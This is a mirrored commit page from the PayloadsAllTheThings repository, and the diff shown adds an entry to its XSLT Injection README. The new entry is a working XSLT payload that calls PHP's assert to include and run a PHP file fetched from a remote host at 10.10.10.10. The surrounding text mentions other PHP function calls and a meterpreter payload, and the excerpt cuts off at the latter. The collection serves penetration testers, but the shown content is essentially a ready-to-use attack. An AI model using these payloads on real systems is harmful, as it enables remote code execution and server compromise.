gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-12-12 15:49:38 -08:00
Code Issues Packages Projects Releases Wiki Activity

AD mitigations

Browse Source
This commit is contained in:
Swissky
2019-12-26 12:09:23 +01:00
parent 1535c5f1b3
commit 4b10c5e302
3 changed files with 60 additions and 20 deletions
Download Patch File Download Diff File Expand all files Collapse all files

14
XSLT Injection/README.md
View File

@@ -132,6 +132,20 @@ Execute the function `scandir`.
</xsl:stylesheet>
```
Execute a remote php file using `assert`
```xml
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
<xsl:variable name="payload">
include("http://10.10.10.10/test.php")
</xsl:variable>
<xsl:variable name="include" select="php:function('assert',$payload)"/>
</body>
</html>
```
Execute a PHP meterpreter using PHP wrapper.
```xml